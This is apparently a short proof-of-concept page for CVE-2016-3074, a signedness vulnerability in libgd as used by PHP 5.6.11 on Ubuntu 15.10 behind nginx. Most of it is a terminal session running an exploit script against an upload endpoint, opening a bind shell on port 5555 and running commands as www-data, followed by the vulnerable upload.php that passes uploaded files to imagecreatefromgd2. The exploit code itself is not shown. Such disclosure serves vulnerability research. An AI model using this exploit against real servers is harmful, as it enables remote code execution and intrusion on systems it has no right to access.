Hans Jerry Illikainen

CVE-2016-3074: php 5.6.11 + libgd: signedness vulnerability

Apr 22, 2016

PoC for CVE-2016-3074 targeting Ubuntu 15.10 x86-64 with php5-gd and php5-fpm running behind nginx.

$ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php
[*] this may take a while
[*] offset 912 of 10000...
[+] connected to 1.2.3.4:5555
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

uname -a
Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC
2016 x86_64 x86_64 x86_64 GNU/Linux

dpkg -l|grep -E "php5-(fpm|gd)"
ii  php5-fpm       5.6.11+dfsg-1ubuntu3.1 ...
ii  php5-gd        5.6.11+dfsg-1ubuntu3.1 ...

cat upload.php
<?php
    imagecreatefromgd2($_FILES["file"]["tmp_name"]);
?>